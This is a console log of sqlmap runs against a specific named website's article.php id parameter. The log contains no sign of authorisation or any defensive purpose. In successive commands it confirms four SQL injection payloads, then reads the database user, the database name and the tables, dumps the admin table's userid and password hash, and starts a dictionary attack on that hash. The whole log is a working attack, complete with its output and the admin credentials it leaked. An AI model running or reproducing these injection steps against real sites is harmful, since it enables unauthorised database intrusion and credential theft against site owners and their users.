D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>